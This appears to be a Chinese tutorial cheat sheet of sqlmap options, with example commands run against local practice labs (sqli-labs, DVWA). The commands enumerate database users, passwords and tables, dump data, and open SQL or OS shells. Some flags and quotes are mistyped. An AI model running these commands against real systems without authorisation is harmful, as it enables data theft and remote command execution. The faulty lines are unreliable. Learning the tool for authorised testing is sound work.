1.-u --url=url参数
示例:
sqlmap -u "http://192.168.147.137/sqli/Less-1/?id=1"
sqlmap --url="http://192.168.147.137/sqli/Less-1/?id=1"
2.-l(L的小写)
从burpsuite或webscarab代理日志中加载目标。
示例:sqlmap -l target.txt
3.
–method=POST/GET:设置HTTP接受数据方式
–data=“uname=‘123’&passwd=‘456’”: 通过POST发送数据参数,sqlmap会像检测GET参数一样检测POST的参数。
–param-del=’&’ :当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。
示例:sqlmap -u http://192.168.148.137/sqli/Less-11/ --method=POST --data='uname="123"&passwd="456"' --param-del='&'
将会测试uname与passwd字段是否存在注入。
4.
–cookie=‘cookie’:设置cookie值
–user-gaent=’’:设置user-agent字段
–headers=’’:增加额外的HTTP头
–referer=’’:设置referer字段
–proxy=’’:设置proxy
–delay=5:设置两个HTTP消息之间的间隔
5.
–threads=3:设置连接数目,默认为1
6.-p param:设置测试param参数
–skip=param:不测试此字段
示例:sqlmap -u http://192.168.148.137/sqli/Less-11/ --method=POST --data='uname="123"&passwd="456"' --param-del='&' -p uname
7.–dbms=DBMS:设置测试网站的数据库类型(前提已知后台为哪种数据库)
示例:sqlmap -u http://192.168.148.137/sqli/Less-1/?id=1 --dbms=mysql
8.–level=1-5:设置测试等级
–string=STRING 查询时有效时在页面匹配字符串
–not-string=NOT 当查询求值为无效时匹配的字符串
–regexp=REGEXP 查询时有效时在页面匹配正则表达式
–code=CODE 当查询求值为True时匹配的HTTP代码
–text-only 仅基于在文本内容比较网页
–titles 仅根据他们的标题进行比较
9.
-a --all:获取所有信息
-b --banner:获取数据库banner信息
–current-user:当前用户
–current-db:当前数据库
–hostname:获取主机名
–is-dba:判断是否为dba(数据库管理员)
–users:枚举用户
–password:暴力猜测密码
示例:sqlmap -u "http://192.168.148.137/sqli/Less-1/?id=1" --users
sqlmap -u "http://192.168.148.137/sqli/Less-1/?id=1 --passwords"
–privileges:查看具有哪些权限
–roles:枚举角色
–dbs:枚举数据库
–tables:枚举库中的表名
–columns:枚举表中字段名
–dump:枚举数据库表项
–dump-all:枚举数据库所有表项
–search:查找指定的列、表、库
示例:
sqlmap -u 'http://192.168.148.137/sqli/Less-1/?id=1 -D dvwa
--search(查找是否存在dvwa数据库)
sqlmap -u 'http://192.168.148.137/sqli/Less-1/?id=1' -D dvwa -T user --search(在dvwa库中查找user表)`
-D:指定数据库
-T:指定表名
-C:指定列名
-U:指定用户
–exclude-sysdbs:指定枚举时跳过系统数据库
–sql-query=QUERY:运行sql语句
–sql-shell:返回可交互的shell
–os-shell:返回shell
os-cmd=CMD:执行命令
10.-reg-*:与windows注册表有关操作
11.–batch:使用默认参数
12.–forms:测试目标页面的表单是否存在注入
13.sqlmap --sqlmap-shell:sqlmap命令行模式